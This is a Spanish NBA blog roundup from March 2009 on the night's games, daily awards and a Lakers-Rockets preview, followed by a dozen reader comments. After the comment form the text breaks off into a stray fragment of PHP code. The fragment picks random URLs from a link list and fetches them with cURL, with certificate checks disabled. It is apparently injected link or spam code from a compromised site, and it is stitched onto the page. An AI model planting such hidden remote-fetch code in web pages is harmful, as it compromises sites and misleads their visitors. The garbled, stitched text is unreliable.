La Crónica (10/03/2009)

11 de March de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

La de anoche fue una jornada de transición, sin excesivas emociones en juego.

Vimos, eso sí, cómo Nowitzki prácticamente le daba la puntilla a su amigo Nash en el partido más importante de la jornada. Los Suns volvieron a cuajar un buen partido ofensivamente pero tiraron sus esperanzas en los pequeños detalles. Ya sabemos que ahora mismo es mucho pedir que defiendan un poco, pero con algún triple más acertado y/o algún tiro libre menos fallado ahora mismo estaríamos hablando de que todavía siguen vivos. Los seguidores de Phoenix pueden acogerse a aquello de “mientras hay vida…” pero muy poquitos apostarían sus ahorros por este equipo.

Vimos como LeBron se reivindicaba en su camino hacia el MVP. Lo hizo a su manera, cuajando un triple doble como el que se merienda un plátano y guiando a su equipo hacia la victoria en un partido que se les había puesto muy cuesta arriba. No sabemos si el hacerlo tan fácil le beneficia para ese propósito en concreto pero lo que parece claro es que, por primera vez en la temporada, ve peligrar el premio. Con actuaciones tan penosas como la de anoche de Mo (pese a que anotó el triple que completó la remontada), lo puede tener más fácil. En frente, unos correosos Clippers casi al completo con el retorno de Kaman.

También vimos a los Jazz logrando la 12ª a pesar del mal partido de Deron. Lo hicieron en una difícil plaza como es el Conseco, a base de intensidad y presión al balón, forzando a los Pacers a autoinmolarse. Sloan ha vuelto y es que ayer supo perfectamente qué hacer cuando tienes a TJ Ford y Jack como distribuidores rivales. Le echábamos de menos.

Popovic bajó a Larry Brown a la tierra. No será él quien se ponga nervioso con una defensa cerrada y un ritmo lento. Hizo a sus jugadores mover la bola con paciencia y tirar con eficacia. Más de un 60% en triples y la defensa de los Bobcats hincando la rodilla.

Por último, los Knicks de la mano del nuevo dúo estelar Hughes&Robinson le ganaron la partida a los Bucks a pesar de Villanueva, y Green & Westbrook le dieron otra victoria a los Thunder frente a los Kings.

PREMIOS

MVP: Lideró a su equipo en una remontada de 19 puntos en el último cuarto y se apuntó otro triple doble. Pocos argumentos hay para no dar a LeBron James el MVP del día tras sus 32 puntos, 13 rebotes, 11 asistencias, 2 robos y 2 tapones frente a los Clippers.

El rookie: Pese a sus 7 pérdidas de balón, Russell Westbrook fue el mejor debutante del día con 22 puntos, 5 rebotes y 4 asistencias, y sobre todo por liderar un nuevo triunfo de unos Thunder enrachados curiosamente a partir de la lesión de Durant.

La sorpresa: La culpa de que Larry Hughes no sea el MVP del día la tiene LeBron. Así que se lleva el premio al jugador más sorprendente gracias a sus 39 puntos, con 13 de 20 en tiros incluyendo un 5 de 8 en triples, además de 6 rebotes, 4 robos y 2 asistencias. Hughes parece haber vuelto a sus días en Washington.

La decepción: El 3 de 16 en tiros de Richard Jefferson, coronado con sólo 3 rebotes, 1 asistencia y 5 pérdidas, se lleva el premio individual. El colectivo va para los Suns, que ya están a 5 partidos de las posiciones de Playoffs, y para los Clippers, que en el día del regreso de Chris Kaman a las pistas, encajaron un 35-16 en el último cuarto que permitió a los Cavs remontar 19 puntos y llevarse una impensable victoria del Staples Center.

El mayor esfuerzo en vano: Charlie Villanueva sigue a lo suyo. En la derrota ante los Knicks, el jugador de origen dominicano logró su cuarto partido con más de 30 puntos en lo que va de 2009 al anotar 32 puntos, a los que sumó 9 rebotes.

RAZONES PARA TRASNOCHAR

La madrugada del miércoles nos presenta un programa de lo más completo. De los once encuentros que se disputarán, destacamos uno, además de seleccionar al jugador al que hay que prestar especial atención:

Lakers @ Rockets (1:30 h. GMT+1). Pese a conservar el mejor balance de la liga, los angelinos han caído en sus tres últimos partidos a domicilio, en los que han dado claras señales de fatiga. A la ya conocida ausencia de Bynum se sumará hoy la de Odom, sancionado por abandonar el banquillo tras la falta de Ariza (quien sí jugará) a Rudy. El escenario no parece el más propicio: los Rockets acumulan doce victorias consecutivas en el Toyota Center y se han adaptado perfectamente a la vida sin T-Mac, tanto que presentan el sexto mejor balance de la NBA.

Atentos a… quién si no: Dwyane Wade. Unos Celtics repletos de bajas son el nuevo test para el emergente candidato a MVP, que viene promediando 36.5 puntos y 10.8 asistencias en los últimos 11 partidos. El partido se disputa a las 00:30 horas (GMT+1).

La pregunta del día: ¿Veis a los Suns alguna posibilidad de remontar y meterse en Playoffs?

Comenta

12 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Venga, va, lo digo: Durant se lesiona y los Thunder se ponen a ganar partidos. Si en lugar de Durant llega a ser el innombrable, ¡¡la que se lía!! 😀

    PD: Durant me parece unos de los mejores jugadores de la temporada, que conste.

      Citar

  2. TheDeerHunter dice:
    #2

    Los Suns imposible…

    Y lo de Ariza/Odom me parece fatal. Creo que deberían haber sancionado a ambos. Menuda rachita que me llevan…

      Citar

  3. Miguel dice:
    #3

    Segun ha dicho Jackson, Bynum estará disponible para principios de Abril.

      Citar

  4. TheDeerHunter dice:
    #4

    Ehm… lamentáblemente no ha dicho eso.
    Ha dicho que pasa de hablar más de Bynum hasta principios de Abril (Fuente LA Times) y eso viene a colación porque en principio se dijo que la recuperación podría adelantarse a finales de marzo.

      Citar

  5. Txusma dice:
    #5

    Pues los Lakers sin Bynum son menos Lakers y como no se recupere para Playoffs las apuestas pueden cambiar considerablemente.
    Ah! Los Thunder con Durant, dsd la llegada de Krstic, tb ganaban partidos.

      Citar

  6. MagicJohnson32 dice:
    #6

    Los Thunder habían perdido los últimos 7 (y 10 de los últimos 12) cuando se lesiona Durant. A partir de ahí han ganado 5 de 6.

    Y lo más curioso: en esos 12 partidos antes de la lesión de Durant, los Thunder siempre habían encajado más de 100 puntos. En los 6 partidos sin Durant han encajado 100 una sola vez, en la única derrota (que es en pista de los Hornets).

    Eh, yo no digo que Durant empeore a los Thunder, ni muchísimo menos. Sólo lo digo para probar que el razonamiento que utilizamos para los Pistons no puede ser tan simplista.

      Citar

  7. couxe dice:
    #7

    Hombre, pues los suns lo tienen muy muy crudo… Tendrían que encadenar una racha muy buena de aquí al final, y no se les ve que ahora mismo puedan…

      Citar

  8. sabas dice:
    #8

    Los Suns creo que no llegan;pero ¿y los Bulls podran conservar la octava plaza? Pensaba que les iria mejor con los nuevos

      Citar

  9. sabas dice:
    #9

    Bueno mirardo la clasificacion pueden quedar hasta sextos que la cosa esta reñida.

      Citar

  10. MagicJohnson32 dice:
    #10

    En el Este, es de suponer que Miami, Detroit y Philly aguantarán. Pero para el octavo puesto puede pasar cualquier cosa. Hasta NY Knicks, que son 13º, tienen sus buenas posibilidades (están a sólo 2,5 partidos de los Bulls). De todas formas, sea quien sea no le veo ganándole un solo partido a los Cavs.

      Citar

  11. Txusma dice:
    #11

    Ah! Pero el octavo del Este se presentara para jugar?

      Citar

  12. Viva_Dirk dice:
    #12

    Ya deciamos el año pasado eso del 8º del Este y hubo ostias en la primera ronda.

    Magic, pedazo de intoxicador, ¿a que equipos han ganado los Thunder sin Durant?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>